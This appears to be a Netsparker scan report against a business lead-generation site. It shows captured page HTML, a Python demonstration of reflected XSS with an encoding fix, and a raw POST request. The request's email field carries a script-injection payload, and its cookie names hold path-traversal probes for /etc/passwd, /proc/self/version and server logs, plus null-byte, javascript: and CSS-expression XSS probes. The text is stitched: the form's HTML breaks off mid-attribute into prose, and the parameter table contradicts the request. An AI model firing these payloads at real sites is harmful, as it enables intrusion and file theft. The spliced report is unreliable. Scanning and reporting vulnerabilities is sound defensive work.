Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> <input name="companyServices" type="text" value="..
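The confirmed /whitePapaper.html findings above (company, companyServices and now email) all have the same shape: the POST value is written straight back into the re-rendered form's `<input ... value="...">` attribute, so the probe's leading `'"` closes the attribute and `--></style></script>` closes whatever context might otherwise be open before `<script>netsparker(...)</script>` lands in the page. The block below is an added example and not code from the scan report or from insideup.com: it models that sink in Python, puts the attribute-encoded fix beside it, and reproduces the "confirmed" step by checking whether the marker ends up inside a real `<script>` element rather than merely appearing somewhere in the body. The server-side rendering is an assumption; only the field names, the probe string and the marker format are taken from the report, and treating every field the same way is also an assumption, since the report only confirms the fields it probed.

```python
import re
from html import escape
from html.parser import HTMLParser

# Added example, not code from the scan report or from insideup.com. The
# server-side rendering below is an assumption; only the field names and the
# probe/marker shape come from the report.

FIELDS = ["firstName", "lastName", "company", "phone", "email", "url", "companyServices"]

# Probe in the shape the scanner used. The closers in front of <script> break
# out of an attribute, an HTML comment, a <style> or an open <script> block,
# so one string covers several reflection contexts.
PROBE_TEMPLATE = "'\"--></style></script><script>netsparker(%s)</script>"


def render_form_vulnerable(params):
    """Echoes each submitted value straight into the value attribute (what the report shows)."""
    return "\n".join(
        '<input name="%s" type="text" value="%s"/>' % (name, params.get(name, ""))
        for name in FIELDS
    )


def render_form_fixed(params):
    """Same form with HTML attribute encoding; quote=True also escapes ' and "."""
    return "\n".join(
        '<input name="%s" type="text" value="%s"/>' % (name, escape(params.get(name, ""), quote=True))
        for name in FIELDS
    )


class _ScriptCollector(HTMLParser):
    """Collects the text of every <script> element the way a browser tokenizes the page."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def live_markers(body):
    """Marker ids from netsparker(...) calls that sit inside real <script> elements.

    An encoded copy (&lt;script&gt;netsparker(...)) stays attribute text and is
    not returned; that is the difference between 'reflected' and 'confirmed'.
    """
    collector = _ScriptCollector()
    collector.feed(body)
    collector.close()
    return re.findall(r"netsparker\((0x[0-9A-Fa-f]+)\)", "\n".join(collector.scripts))


def confirm_reflected_xss(render, fields=FIELDS):
    """Probe one field per request, as the scanner does, and list the fields that yield live script."""
    confirmed = []
    for i, field in enumerate(fields):
        marker = "0x%06X" % (0x1151 + i)          # per-request id, like 0x001151 in the report
        params = {name: "3" for name in fields}   # benign filler, as in the report's other fields
        params[field] = PROBE_TEMPLATE % marker
        if marker in live_markers(render(params)):
            confirmed.append(field)
    return confirmed


if __name__ == "__main__":
    print("vulnerable:", confirm_reflected_xss(render_form_vulnerable))
    print("fixed:     ", confirm_reflected_xss(render_form_fixed))
```

Against the vulnerable renderer every probed field is confirmed; against the encoded renderer none is, because `escape(..., quote=True)` turns the breakout quotes and angle brackets into `&#x27;`, `&quot;`, `&lt;` and `&gt;`, and the whole probe stays inside the attribute value. Attribute encoding is the right fix for this particular sink; a value that is also copied into a JavaScript string, a URL or a CSS block needs the encoding that matches that context instead.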
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST '"--></style></script><script>alert(0x001181)</script>
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 210
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001181)%3c%2fscript%3e&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:16 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=C815DBB99955FE1AA4CE4F09E8220C78; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
